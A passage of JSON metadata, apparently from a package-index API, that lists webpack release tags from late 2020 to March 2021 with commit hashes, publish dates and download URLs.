5","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ec